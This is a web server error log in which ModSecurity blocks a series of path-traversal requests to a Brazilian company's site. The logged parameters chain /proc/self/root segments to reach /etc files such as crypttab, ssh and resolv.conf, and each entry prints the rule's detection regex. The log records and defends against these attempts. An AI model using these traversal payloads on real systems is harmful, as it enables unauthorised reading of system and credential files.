[Fri Mar 20 09:22:10.912083 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:34690] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab078ta6ubjKNq_cu4bn0wAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:12.377437 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:51048] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab079OoXxyEfFpUF8f-RIgAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:13.927089 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.241.31:51056] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab079fqxLDW4GITHUkT6dQAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:15.202222 2026] [:error] [pid 9818:tid 140411582465792] [client 74.7.241.31:51060] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07911pVZ5mVmJwsFNB-AAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:16.511092 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.241.31:51062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07-PXLqtnMIWvjpaKqyAAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:17.855360 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.241.31:48108] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07-TJ3M9BSuKP7CAYvUAAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:19.257332 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.241.31:48114] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07--oXxyEfFpUF8f-RKwAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:21.424651 2026] [:error] [pid 31215:tid 140411733534464] [client 74.7.241.31:48116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07_AF0L0L-SsrnPo55DAAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:23.199587 2026] [:error] [pid 21219:tid 140411540502272] [client 74.7.241.31:48130] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab07__XLqtnMIWvjpaKq0AAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:24.731989 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.241.31:48142] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08ADJ3M9BSuKP7CAYvVwAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:26.185922 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:48156] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08AuoXxyEfFpUF8f-RMAAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:27.587035 2026] [:error] [pid 9818:tid 140411574073088] [client 74.7.241.31:37444] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08A11pVZ5mVmJwsFNCCgAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:28.493798 2026] [mime_magic:error] [pid 10189:tid 140411540502272] (70014)End of file found: [client 216.73.216.191:38714] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:22:29.111145 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.241.31:37454] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08BfXLqtnMIWvjpaKq1gAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:30.387574 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.241.31:37462] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08BvXLqtnMIWvjpaKq1wAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:31.765274 2026] [:error] [pid 9818:tid 140411649607424] [client 74.7.241.31:37466] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08B11pVZ5mVmJwsFNCEAAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:33.057685 2026] [:error] [pid 7235:tid 140411548894976] [client 74.7.241.31:37470] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08CfqxLDW4GITHUkT6hAAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:34.543540 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.241.31:37486] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08CvXLqtnMIWvjpaKq2gAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:35.865673 2026] [:error] [pid 11167:tid 140411557287680] [client 74.7.241.31:37492] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08C_HIg5MgXLBnicMHpAAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:38.892346 2026] [mime_magic:error] [pid 10189:tid 140411641214720] (70014)End of file found: [client 57.141.18.63:39452] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:22:39.997345 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.241.31:37502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08DzJ3M9BSuKP7CAYvcAAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:40.156114 2026] [:error] [pid 10189:tid 140411733534464] [client 216.73.216.191:39532] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab08EDJ3M9BSuKP7CAYvcQAAAIE"]
[Fri Mar 20 09:22:42.053831 2026] [:error] [pid 9818:tid 140411607643904] [client 74.7.241.31:56854] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08EV1pVZ5mVmJwsFNCHQAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:22:44.276105 2026] [:error] [pid 11167:tid 140411582465792] [client 74.7.241.31:56862] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab08FPHIg5MgXLBnicMHsgAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
